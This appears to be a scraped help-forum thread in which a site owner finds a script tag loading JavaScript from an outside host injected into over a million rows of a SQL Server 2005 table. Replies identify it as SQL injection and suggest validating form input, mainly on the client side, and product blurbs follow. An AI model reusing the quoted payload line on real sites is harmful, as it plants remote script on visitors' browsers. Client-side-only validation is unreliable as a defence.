<div>
Sounds like a SQL injection attack. Are you using form fields or URL parameters on the site?
</div>


Sounds like a SQL injection attack. Are you using form fields or URL parameters on the site?

<div>
Yes I &nbsp;have got the registration pages where I accept data from the customers using form fields...<br />
<br />
How can I stop happening again please advise.<br />
<br />
Thanks
</div>


Yes I  have got the registration pages where I accept data from the customers using form fields...

How can I stop happening again please advise.

Thanks

<div>
...or validate the form data on the client end and prevent symbols from being entered in the first place.
</div>


...or validate the form data on the client end and prevent symbols from being entered in the first place.

<div>
<div class="content wysiwyg-content">
Hello Experts,<br />
I have found a strange block of javascript got apended to one of the customers table field in my database .<br />
The jscript looks something like this <br />
&lt;SCRIPT SRC=<a href="HTTP://2677.IN/YAHOO.JS" rel="ugc">HTTP://2677.IN/YAHOO.JS</a>&gt;&lt;/SCRIPT&gt;<br />
And I found this in almost every row of 1123200 records in the table.<br />
I dont understand how this got added but this seems to have happend only today.<br />
Please can someone advise if this make sense? Is this possible to someone update the database field which I have saved and secured on my dedicate server hosting.<br />
Your help would greatly be appreciated.<br />
Thanks<br />
Sam<br />

</div>
</div>


Hello Experts,
I have found a strange block of javascript got apended to one of the customers table field in my database .
The jscript looks something like this 
<SCRIPT SRC=HTTP://2677.IN/YAHOO.JS></SCRIPT>
And I found this in almost every row of 1123200 records in the table.
I dont understand how this got added but this seems to have happend only today.
Please can someone advise if this make sense? Is this possible to someone update the database field which I have saved and secured on my dedicate server hosting.
Your help would greatly be appreciated.
Thanks
Sam


possible attack on my SQL server 2005 DB?

Microsoft SQL Server 2005 is a suite of relational database management system (RDBMS) products providing multi-user database access functionality.Component services include integration (SSIS), reporting (SSRS), analysis (SSAS), data quality, master data, T-SQL and performance tuning. It includes support for managing XML data and allows a database server to be exposed over web services using Tabular Data Stream (TDS) packets encapsulated within SOAP (protocol) requests.

Microsoft SQL Server 2005

The successor to Active Server Pages, ASP.NET websites utilize the .NET framework to produce dynamic, data and content-driven web applications and services. ASP.NET code can be written using any .NET supported language. As of 2009, ASP.NET can also apply the Model-View-Controller (MVC) pattern to web applications

ASP.NET

The .NET Framework is not specific to any one programming language; rather, it includes a library of functions that allows developers to rapidly build applications. Several supported languages include C#, VB.NET, C++ or ASP.NET.